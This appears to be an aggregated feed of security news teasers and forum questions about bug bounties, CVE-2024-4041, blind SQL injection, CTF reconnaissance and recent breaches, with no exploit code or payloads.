Collaborate Disseminate
Bug reporting doesn’t usually have a lot of visuals. Not so with the visionOS bug [Ryan Pickren] found, which fills a user’s area with screeching bats after visiting a malicious …read more Continue reading Bats Can No Longer Haunt Apple VR Headsets Via Web Exploit
I recently reported a Reflected Cross-Site Scripting (XSS) on a wordpress site which was running Yoast CEO 22.4 which is vulnerable to Reflected XSS. see CVE-2024-4041
However The company is demanding me for a Poc or it won’t accept the bu… Continue reading Is there a Poc for Yoast SEO < 22.6 – Reflected Cross-Site Scripting (CVE-2024-4041)
I recently found a boolean-based blind SQLi and since I’m new to the bug bounty scene – I don’t understand what impact I can extract from it.
There is a website like example.com/tarif?tableId=136&dbsource=gkcp&nf=undefined. The vul… Continue reading Is it possible to exploit this supposedly boolean-based blind and time-based blind SQLi (sqlmap)?
Developing responsible AI isn’t a straightforward proposition. On one side, organizations are striving to stay at the forefront of technological advancement. On the other hand, they must ensure strict compliance with ethical standards and regulatory re… Continue reading Red teaming: The key ingredient for responsible AI
Google has drastically increased the rewards bug hunters can get for reporting vulnerabilities in Android apps it develops and maintains. “We increased reward amounts by up to 10x in some categories (for example Remote Arbitrary Code Execution in… Continue reading Bug hunters can get up to $450,000 for an RCE in Google’s Android apps
In this Help Net Security interview, Roy Davis, Manager – Vulnerability Management & Bug Bounty at Zoom, discusses the role bug bounty programs play in identifying security vulnerabilities and facilitating collaboration with researchers. He … Continue reading How to optimize your bug bounty programs
Keren Elazari is an internationally recognized security analyst, author, and researcher. Since 2000, Keren has worked with leading Israeli security firms, government organizations, innovative start-ups, and Fortune 500 companies. She is the founder of … Continue reading Thinking outside the code: How the hacker mindset drives innovation
What is the best way to get more information from the information-gathering stages/ reconnaissance when trying CTFs? Is there any workflow for a new cybersecurity student who knows some programming?
for example consider against virtual mac… Continue reading CTF or Bug Bounty info gathering workflows [closed]
By Deeba Ahmed
Mintlify Scrambles After Security Breach, Revokes Tokens and Implements New Safeguards!
This is a post from HackRead.com Read the original post: Mintlify Confirms Data Breach Through Compromised GitHub Tokens
Continue reading Mintlify Confirms Data Breach Through Compromised GitHub Tokens
By Deeba Ahmed
It is unclear how much the hacker received as part of the Facebook bug bounty program.
This is a post from HackRead.com Read the original post: Nepali Hacker Tops Hall of Fame by Exposing Facebook’s Zero-Click Flaw
Continue reading Nepali Hacker Tops Hall of Fame by Exposing Facebook’s Zero-Click Flaw